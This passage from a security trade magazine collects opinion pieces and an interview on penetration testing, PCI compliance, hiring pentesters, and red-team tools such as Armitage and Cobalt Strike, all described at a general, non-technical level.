the service costs, so it is in their interests to manage that list well. What the asset list does not do,
however, is keep a true track of what should be part of annual testing. From a PCI perspective, maybe
it is effective as long as the organization has kept the SI informed of which applications or data sets
may be considered as within a PCI scope. This is not always something that is as black and white as
it should be, for not all organizations have cleanly defined network scopes or security zones. For those
organizations where a PCI scope may bleed into other networks due to applications being connected to
the PCI zones, unless the SI and the organization are both synchronizing their view of PCI scope, things
may be lost in translation. This can leave some potentially valuable PCI targets out of scope for the
annual testing.

The SI may continue to deliver per

the contract and report all is well,
and the organization may assume all
of PCI is being regularly tested as the
loss of synchronization of asset
details goes unnoticed.
It is not until there is a breach, or possibly worse still the PCI auditor questions why some systems
were missed out that the organization becomes aware of this situation. The same scenario applies to
critical systems which contain confidential data, etc. The organization must ensure the scope the SI is
working to is kept up to date so the right systems get tested, and it is not generally the responsibility of
the SI to pro-actively obtain this information.

25
Regulatory requirements are also evolving and generally this tends towards stricter security controls
which can result in additional complexity. Introducing a requirement to perform authenticated testing, for
example in PCI v3, creates a need to perform Penetration Testing in a very different way on some
systems. For applications that require authentication, it can be very difficult to obtain credentials for the
SI Penetration Testers, or there may be other complexities due to conflicting regulatory requirements
around who can get access or how the access must be provided. If this is a new requirement for which
the organization has never previously had to deal with, especially outside of its pre-production testing
networks, sometimes a new end-to-end facility to permit authenticated testing must be created. All of this
will take time. The contract between the organization and the SI may simply not accommodate this at all,
but the time to find this out is not a few weeks before the regulatory audit is due!

When outsourcing such things as Penetration Testing to an SI, there is often an implicit level of trust and
the service is not generally questioned. Service reporting is often all green indicating all deliverables are
on track; afterall, thats what you pay an SI for to deliver the contracted service on time. You dont
generally get an independent attestation as to quality, or careful validation that it is meeting the real
security requirements of the organization. Few SIs pro-actively deliver this kind of service and it is
incredibly important for the organization to either employ people with the necessary skills to validate the
quality and scope of penetration testing, or to regularly dip-test by using an independent Penetration
Testing organization who can provide a baseline to identify service gaps.

If you are to avoid the pitfalls caused by implicit trust in the services delivered by an SI, and to maximize
the actual deliverables, then the governance over the scope and quality of testing should never
be outsourced directly to the SI. That and the growing pressures of regulatory compliance, especially
PCI, may mean its time to renegotiate the contract with the SI and to seek a regular independent view
to ensure they stay on track.

About the author:

JIM HART
A seasoned Security Professional who has developed and honed his skills
over the past 15 years in security. A consummate specialist who has
successfully transformed from a highly skilled technical engineer, to Manager
of a team of security analysts (UK and matrix-managed those in India),
through consulting and then transitioning into a business development role
delivering thought-leadership for major clients information security
requirements within an Enterprise sales team of a Fortune500 security
software and service provider.

26
 Pentesting
a true art form
by Martin Brough

Pentesting is truly an art form that I have studied for most of my life, however,
pentesting is a dying art form that needs to be resuscitated! I dont mean that
people are no longer using them; in fact, its just the opposite.

I have noticed that over the past five years, annual pentesting is working its way from being thought
of as something you just do to meet (enter acronym here) compliance to standard IT security practice.
Within the past two years, I have noticed a significant increase in companies adding annual pentests
into their contracts with companies that handle their data. Companies that oer services such as SaaS,
cloud data storage, outsourced web development and media management are now all being required
by contract to participate in both annual audits of their systems and penetration tests to ensure their
data is secure. So what do I mean by Pentesting is a dying art form? I meant that pentesting is
a highly skilled practice and should be conducted by professionals who have been trained and know
what they are looking for and how to test your company's systems. It seems that every script-kiddie
with a Kali box these days will tell you they are a pentester!

A true pentest cannot be done from a

box of automated tools
It involves a ton of research, analytics, scanning, probing, watching, social engineering, oh and yeah
exploitation! When I was growing up, if you wanted to learn to be a pentester or how to find
vulnerabilities in software or hardware, you needed to be a member of small groups that did that as a
hobby. Penetration testing used to be viewed as hacking and hackers have always been close-knit
groups that dont share a lot unless you are vetted. Online video resources, like YouTube, I feel have
changed that a lot. If you want to know what command to run in Nikto or Nmap,then just Google it and
find a tutorial that some other teenager posted after watching another teenager do it. I am excited to
see the direction that pentesing is taking as far as being accepted on a corporate level because it says
to me, that people are starting to care about their data and what its doing.

27
I think its really important to convey a few key points about penetration tests; 1. A Pentest does not
make your company un-hackable. The main objective of a well-done pentest is to reduce your attack
surface. Your goal as a company should be to allow the specialized team conducting the pentest, to
treat your network as though they were a real attacker trying to get in. You want to find as many holes
in your network as you can and close them. 2.Put as few restrictions on the pentesters as possible. A
recent trend I have noticed in the past year has been companies that are contractually obligated to
have these tests done but see them as a burden and dramatically limit the network exposure that the
teams are allowed to have. This makes the results of your pentest borderline useless. One example I
have seen of this is when told I can give them a report of my web application scans but under no
circumstances am I to exploit any vulnerability found. Exploitation not only helps to find the directions
of traversal after gaining access but also tests any scanners, firewalls and loggers that are in place to
see if they are configured to pick up on these kinds of events, so it is very important to allow the
pentesters to run a full pentest against your defenses. And finally number 3. After all is said and done,
your pentest is complete and your attack surface reduced and you have your certificate in hand, spend
the next 364 days maintaining the hard work you just put in. Patch your systems, check your logs, and
always verify your code.

A pentest does not make your

company un-hackable.
So what does all this mean for the future of pentesting? I believe that we will continue to see a massive
increase in the requirement to have not only annual but semiannual pentests conducted for high profile
companies especially. I strongly feel that C-Level personnel in these enterprises are starting to see not
just the compliance value but also the security value to having proper pentests conducted. Executives
are able to see firsthand more and more in the news just how important it is to maintain a secure
environment for your companys data. Of course, with the increase in demand for pentesting, there
in turn is an increase in those oering pentest services. Make sure you do your homework on who you
sign to conduct your pentest. That person, whom you give access to your network, can do a lot
of damage if they are guessing their way through! If you see your pentester sitting in your oce
watching a YouTube video on how to use msfconsole, you need to dismiss them as soon as you can.
There are plenty of reputable companies out there, you just need to find one that meets your
company's needs as well as fits your companys financial situation.

About the author:

MARTIN BROUGH
Solutions-oriented IT Specialist with notable success directing a broad range
of corporate IT initiatives while participating in planning and implementation
of information-systems solutions in direct support of business objectives.

28
Think of security as a wheel
and a never ending circle
interview with Martin Voelk CEO of Cyber 51

MARTIN VOELK
Martin is an IT Security veteran with 18 years of experience
in the IT industry. Prior to setting up CYBER 51 in 2009, Martin
was already regularly teaching Penetration Testing Training
Courses, Cisco authorized Security Courses and was regularly
engaged by governments and other businesses to establish
Security policies, perform Ethical Hacking and Penetration Tests
in order to secure network infrastructures and to remediate the
threats encountered.

[PenTest Magazine]: Can you tell us something about yourself?

[Martin Voelk]: My name is Martin Voelk, I am 41 years old and have been in the IT Industry since 1997.
I started out as a systems admin, and moved into networking where I achieved numerous certifications up
to Cisco CCIE. As of 2005, I gained more interest in IT Security and started with penetration testing services
as a contractor. Despite being more on the commercial side of things now, I hold a lot of current pentesting
certifications such as the CEH, OSWP and OSCP as I am fascinated by auditing networks and
infrastructures.

[PM]: What convinced you to establish your own company?

[MV]: Numerous factors played a role. I am an entrepreneur by heart and wanted to create my own
company being able to focus on penetration testing. Financial reward was also one of the drivers and so
was independency.

[PM]: Your firm provides services for companies from dierent sectors like card industry, healthcare,
manufacturing or educational. Do you find more sectors become aware of cyber attacks?

[MV]: Security awareness has certainly reached board level. Many clients we have still dont believe they
could be targeted, but use our services regardless because they are bound to government and industry
regulations such as PCI, HIPAA, ISO 27001 etc.

29
[PM]: What is the major diculty in working with such dierent companies and sectors?

[MV]: One big challenge is to find the right way of addressing uncovered vulnerabilities with customer.
In some occasions, especially in larger companies, internal engineers become very defensive when being
confronted with results. However, its not our aim to finger point. We merely uncover holes and help
customers becoming more secure. On other occasions, the more we find, the more it is appreciated.
Another big challenge is governmental work as it often requires very specific skills and certifications but the
consultant holds a wrong passport. This can be very frustrating at times as, for example, only a UK citizen is
allowed to perform the work for a UK government client.

[PM]: From your own experience, do you prefer to work with smaller or bigger companies?

[MV]: We prefer mid size to large size.

[PM]: I can see your company provides great initiative: free educational sessions for children. Can you
tell us more about this idea?

[MV]: Those are little awareness workshops for children at schools. We started that program in Mexico
where one of our offices is. We teach children how to stay safe when using laptops, smartphones, pads,
social media, chat rooms, etc., and we also show parents how to employ filters for content not suitable for
kids.

[PM]: What are your general thoughts about development of cyber security market?

[MV]: The big areas we see (and where loads of attacks are directed to) are: Human user (Social
Engineering), Web Applications, Mobile Apps and Wireless.

[PM]: As a person who knows penetration testing tools a lot, do you think there are going to be any
breakthrough changes in technology?

[MV]: Cloud Services will change the tool landscape even more than it already has. Web Applications will
become more sophisticated and need more testing and the mobile market brings its own new challenges in
Wireless and Apps.

[PM]: Can you tell us what is changing in terms of recruiting pentesters or cyber security specialists?
Do you find it's going to be harder to find a job in this area?

[MV]: Our main markets are the US and strong emerging markets in Latin America (mainly Brazil, Chile,
Colombia and Panama). We also engage in the UK market but very little in other countries. For us the
biggest challenge is actually finding the right skill set for new hires. Unlike in Europe, companies and
employers in the US actually often struggle to find the right skills available.

The top 3 criteria :

30
- OSPC certified or better (OSCE etc.) The Offensive Security Certifications are the best ones in the market
and we hire OSCPs over CEH, because the OSCP is a hands on and very challenging exam. Someone
who passed that exam is a real pentester who also can do reporting

- - Good English skills to communicate with the customer and write reports. Sounds basic, but a lot of the
guys outside the US dont come with great English language skills.

- Integrity, working to timelines and reliability.

[PM]: Everyday we can hear about new attacks. How do you see cyber threats evolving in the near
future?

[MV]: It will remain a never ending cat and mouse game. The trends are shifting more to organized crime
and away from individual guys. Some of the attacks we have seen at customers require teams of highly
skilled experts and tools and a lot of the underworld has created and is creating task forces for certain jobs.
A lot more challenging to tackle than the lone hacker or script kiddie.

[PM]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in
2016?

[MV]: We see a lot of the regulations which are standard in the Western world being adopted by Latin
American countries now as well. PCI 3.0 introduced a lot of changes which focus more on pentesting. Also
a lot of companies start realizing that technical defense isnt everything and that social engineering makes
up a lot of the breaches. User education and enforcement of policies will become a much bigger part.

[PM]: Do you have any thoughts or experiences you would like to share with our audience? Any good
advice?

[MV]: Think of security as a wheel and a never ending circle. A traditional pentest (Network and Web App) is
not good enough anymore these days. Pentesting should include mobile App, Wireless, Bluetooth and
Social Engineering. For aspiring pentesters and existing pentesters, do the Offensive Security Certified
Professional (OSCP) certification. Its very well recognized in the industry and weeds out the theory from the
hands on folks.

31
 The sword and the
shield
by Tom Updegrove

I started to write this article about one of my favorite security tools Cobalt
Strike but as I delved into the history and thinking behind Cobalt Strike I
realized that a better story lies beneath the surface. The real story is about
Pentesting and Adversarial Role Playing, which is thought to be the next stage
of Digital Security. Theres a whole new breed of White Hat Hackers and they
belong to Threat Actors. Theres a whole new breed of White Hat Hackers and
they are called Threat Actors.

THE FUTURE OF DIGITAL DEFENSE

Penetration Testers tend to focus on gaining access and scream eureka when they get a shell. On the
other hand Threat Actors focus on post-exploitation, lateral movement, and persistence. Most
Penetration Testers that I know, say the test is over once they gain access to a system; whether that
was by gaining access to a server room and dropping a zombie pineapple into the mix, or brute forcing
a password and escalating privileges. On the other hand, Adversarial Role Playing involves a much
longer engagement, and the behavior is more similar to a real Advanced Persistence Threat or APT. The
focus is on how well the Network Defender can detect, mitigate and subdue the invader. According
to Raphael Mudge (the developer of Armitage and Cobalt Strike), this is the future direction of Digital
Defense.

ARMITAGE
On the Armitage home page it says: Cyber Attack Management for Metasploit, but Armitage is more
than that. Armitage is a scriptable red team collaboration tool for Metasploit; that visualizes targets,
recommends exploits, and exposes the advanced post-exploitation features in the framework.

My first introduction to Metasploit was via the CLI, which was important to understand the framework.
How well one understands the Exploits, Payloads, Meterpreter, Auxiliary components and scripts
determines how well and eective the attack is. Seeing the same commands and getting feedback
visually is so much more helpful. More like listening to a TV show on radio then seeing it on 4K flat
screen in surround sound. Well maybe not that extreme but you get the idea.

32
COBALT STRIKE
Cobalt Strikeis like a grown up version of Armitage. According to its website, Cobalt Strike is for
Adversary Simulation and Red Team Operations. Versions 1.0 & 2.0 utilized the Metasploit Framework
and was one of the first usable GUI frontends for Metasploit. An important component of Cobalt Strike
is Beacon. Beacon is Cobalt Strike's payload to model advanced attackers. Use Beacon to egress
a network over HTTP, HTTPS, or DNS. You may also limit which hosts egress a network by controlling
peer-to-peer Beacons over Windows named pipes (Cobalt Strike website). Another aspect of Cobalt
Strike is its social engineering features which allows the Actorto get a foothold, covert command and
control with Beacon, browser pivoting, and reporting to Armitage's existing exploitation and team
collaboration capabilities. Using Beacon you can tunnel Meterpreter commands and utilize all of the
Metasploit exploit and post exploit capabilities. Beacon facilitates the running of Power Shell scripts
over its connection; Python or Java for example. There is even an email phishing module that reports
when your recipients open the Phishing email you sent them.

COBALT STRIKE 3.0

As of October 2015, Cobalt Strike 3.0 does not share code with Armitage or depend on the Metasploit
Framework. It's the first version of Cobalt Strike to not depend on the Metasploit Framework. The tool
is geared towards red team operations and adversary simulation services. Although it does not depend
on the Metasploit Framework you can still run Metasploit elements.

Through one Metasploit instance, your team will:

Use the same sessions

Share hosts, captured data, and downloaded files

Communicate through a shared event log.

Run bots to automate red team tasks.

Since October 2015, Cobalt Strike 3.0 has been available via the website. You can download a trial
version at https://www.cobaltstrike.com/trial . You can also download its sibling (Armitage) free
of charge athttp://www.fastandeasyhacking.com/download

RED TEAMS
According to Wikipedia A red team is an independent group that challenges an organization
to improve its eectiveness. The United States intelligence community (military and civilian) has red
teams that explore alternative futures and write articles as if they were foreign world leaders.Little
formal doctrine or publications about Red Teaming in the military exist.[1]

LtCol Brendan S. Mulvaney Marine Corps Gazette July 2012. "Strengthened Through the Challenge"(PDF).

33
PENETRATION TESTERS AND RED TEAMS
Penetration testers assess organization security, often unbeknownst to the clients sta (only
management would be aware of the assessment). This type of Red Team provides a more realistic
picture of the security readiness than exercises, role playing, or announced assessments. The Red
Team may trigger active controls and countermeasures within a given operational environment.

Red Team Operations

- Full Scope Penetration Tests
-Long-term Operations
-War G a m e s
-Threat Scenarios / Cyber Security Exercises / Attack Simulations

Once a threat actor gains access to

the network, they maintain the
communication with the
compromised computer system.
THREAT ACTORS
Threat actors gain more privileges by getting login credentials from the network that has access to
valuable information. They also gather information (e.g. documents found in desktops, network access
for shared drives etc.) via regular user accounts. Once identified, the data is made ready for exfiltration.

GAINING PERSISTENCE ACROSS THE NETWORK

Lateral movement usually involves activities related to reconnaissance, credentials stealing, and
infiltrating other computers.

When communication with the compromised systems and C&C (command and control) servers has
been established, threat actors sustain persistent access across the network. They move laterally within
the network and gain higher privileges through the use of dierent tools. This in turn enables threat
actors to have access to servers, which contain valuable informationthe company crown jewels.

Apart from servers, threat actors are also interested in endpoint systems. For instance, confidential
documents such as Microsoft Word, Microsoft Excel and Microsoft PowerPoint files are stored
on personal computers.

34
As threat actors move deeper into the network, their movements and methods become dicult
to detect, especially when they utilize Windows features and tools typically used by IT administrators.
Gaining administrative privileges also makes threat actors activities undetected or even untraceable.

REMEDIATION
In the past few years, there have been a number of great industry reports written and statistics shared
on data breaches and investigations. Many of them focus on investigative findings and detection
trends. There has been less focus, however, on what is arguably the most transformative component
of an adversarial engagement the successful remediation and the maturation of an organizations
ability to detect and respond to attacks moving forward. How do attackers respond to remediation
actions, and what distinguishes successful organizations from those that were less successful?

A few points to consider;

-The average time for attackers to conduct reinfection attempts after an organization completes initial
remediation

-The percentage of organizations impacted by more than one attack group at a time

-The percentage of organizations who are detecting attacks internally versus those that are being
notified by third parties

-The factors that influence eective and ecient investigation and remediation

-Why some organizations remediate successfully and eciently, and why others struggle

THE TOOLS
The tool needs for Adversary Simulations are far dierent. A unique covert channel matters far more
than an unpatched exploit. A common element of Adversary Simulations is a white box assumed
breach model. Just as often as not, an Adversary Simulation starts with an assumed full domain
compromise. The goal of the operator is to use this access to achieve eects and steal data in ways
that help exercise and prepare the security operations sta for what theyre really up against.
Remember too, that the threat actor in a production environment may also be an employee of the
company, acting inside the corporate network.

ADVERSARY SIMULATION TRAINING

The tools for Adversary Simulation are coming. The tools alone are not the full package however.
Adversary Simulations require more than good tools, they require good technicians.

TRADECRAFT
Raphael Mudge uses the term Tradecraft to describe the mindset for Adversary Simulations. He says
that they require an appreciation for the ecacy that simply isnt there in the penetration testing
community yet. Tradecraft are the best practices of a modern Adversary. What is the adversarys

35
playbook? What checklists do they follow? Why do they do the things they do?-these are questions
that need to be asked by a corporates security defenders.

THE BEST DEFENSE IS A GOOD OFFENCE

Both Armitage and Cobalt strike pack enough oensive capability to both abruptly take down
a network instantly as well as the ability to act as a long term data exfiltrator. Penetration Testers will
get the most benefit from the current version of Armitage due to its use of the Metasploit Framework
and ready-made exploits. Threat Actors will get the most benefit from Cobalt Strike 3.0 due to its
Beacons and Social Engineering tool set. Whichever tool you use wield it like a sword so the
network defenders can develop their defensive skills.

About the author:

TOM UPDEGROVE
ITC expert in the Philadelphia/DC Metro area. He is CEO of Philadelphia
based Internetwork Service & Security where he manages a number
of business networks and provides advice for network design, work flow,
performance optimization and security. He is also an EC Council certified
trainer and conducts classes in Ethical Hacking in the Washington DC area.
Tom has recently been featured in a video series along with partner Larry
Greenblatt in the program they created Cyber Kung Fu. This has been
released on Secure Ninja TV and it shows all of the concepts and tools that
the Pros use for Pen Testing. https://www.youtube.com/watch?
v=8R3QjNXDaVA. He has also presented security lectures at Hacker Halted
and Sharkfest in 2014.

36
 Impact of compliance
on information security
by Ayo Tayo Balogun

"Target was certified as meeting the standard for the payment card industry in
September 2013. Nonetheless, we suffered a data breach."Target Chairman,
President, and Chief Executive Officer Gregg Steinhaf

In Information Security, there are a plethora of Laws and Regulations: SarbanesOxley Act (SOX);
Payment Card Industry Data Security Standard (PCI DSS); GrammLeachBliley Act (GLB); Electronic
Fund Transfer Act, Regulation E (EFTA); CustomsTrade Partnership Against Terrorism (CTPAT); Free and
Secure Trade Program (FAST); Children's Online Privacy Protection Act (COPPA); Fair and Accurate
Credit Transaction Act (FACTA), including Red Flags Rule; Federal Rules of Civil Procedure (FRCP).
Some of the industryspecific Guidelines and Requirements include: Federal Information Security
Management Act (FISMA); North American Electric Reliability Corp. (NERC) standards; Title 21 of the
Code of Federal Regulations (21 CFR Part 11) Electronic Records; Health Insurance Portability and
Accountability Act (HIPAA); The Health Information Technology for Economic and Clinical Health Act
(HITECH); Patient Safety and Quality Improvement Act (PSQIA, Patient Safety Rule); H.R. 2868: The
Chemical Facility AntiTerrorism Standards Regulation. How many of these Regulations, Laws,
Guidelines a business needs to adhere to would depend on what part of the world the business
operates from (or is domiciled).

Laws, Regulations, Standards and Guidelines are very familiar words when it comes to Information
Security. One other word that ties all the previous words together is Compliance. Compliance, generally
speaking, is the basis for audits. Compliance is also the native language the Executive Management
of any enterprise understands. The great debate for us however is: does compliance really translate
to good security?

good information security covers

people, process and technology.
What is Good Information Security? According to Malcolm Carrie, head of global strategy and
architecture at BAE Systems, good information security covers people, process and technology.

37
It creates the understanding, at all levels in the organization, that finding the appropriate balance
of availability, integrity and confidentiality requires a full appreciation of the risks.

The rush for Compliance has more or less taken center stage in recent times, and a lot of businesses
(and the people driving those businesses) forget or are unaware of the fact that Information Security
needs should primarily be the driving force for Compliance criteria/metrics; people would not just erect
the compliance barrier for its own sake. In order to achieve good security, appropriate processes,
practices and technologies need to be implemented. In 2014, the FBI sent a warning to the healthcare
industry that its data was not secure. The biggest vulnerability was the perception of IT healthcare
professionals beliefs that their current perimeter defenses and compliance strategies were working
when clearly the data states otherwise.

Lots of organizations focus on compliance and have several reams of paper to show for it policies,
procedures, and training records. Several of these organizations purchase compliance-in-a-box kits,
and because the focus is on compliance and not really security, much of the content of the compliance-
in-a-box kit still has the original blank spots where the name of the organization in question should have
been inserted. A lot of the organizations that eventually complete their documentation might never
incorporate the documentation into the corresponding process. Additionally, because assessment for
compliance might be primarily based on responding to hundreds of questions in compliance
assessment tools, or discussing with consultants, many businesses will maintain that the security
described in their policies and procedures is really in place. They might even believe it themselves!

The fact that a company has been

certified compliant does not
guarantee that it is secure
The importance of compliance cannot be overemphasized but true Information Security goes way
beyond ticking boxes and answering a few generic questions that the consultant may have prepared.
The goal of compliance programs is to satisfy externally imposed requirements, and the requirements
in point may or may not support an eective security program. The fact that a company has been
certified compliant does not guarantee that it is secure, and some obligations that it fulfills may not
contribute anything to security. For every business that can aord it, building an in house IT security
team might be the best way to go, and for businesses that are unable to aord it, having
a knowledgeable consultant(s) review their business process and advise, as well as help implement
appropriate security solutions, would be the way to go.

Irrespective of the sector a business operates in, the management needs to know that hackers will
always look for loopholes, and unless a business implements a comprehensive security program, and
remains eternally vigilant, hackers will always find the loopholes they want, either by exploiting the OS,
the infrastructure, the firmware, the process or the people. Risk analysis is also a very critical success
factor in information security. Businesses should determine how much risk they are exposed to and
plan accordingly after appropriately classifying the risk. Risk analysis should be done as regularly
as practicable to ensure that no part of the business process is being excluded.

38
Ensuring that the IT security team is knowledgeable and dedicated is also a major requirement that
needs to be addressed. One can never know how truly secure a system is until it has been tested. The
IT security team (complementary to the testing by external consultants) needs to routinely conduct
penetration testing exercises to evaluate every facet of the business process, not with the intention
of achieving regulatory compliance but with the objective of determining the security posture of the
business in order to apply any needed corrective measures before vulnerabilities are exploited by
hackers.

About the author:

AYO TAYO BALOGUN

Information Security Analyst with Technology Support and Management
experience. Hes a serial contributor and beta tester for online IT Security
publications. Ayo currently works as Head of Enterprise Security
at SystemSpecs Nigeria.

39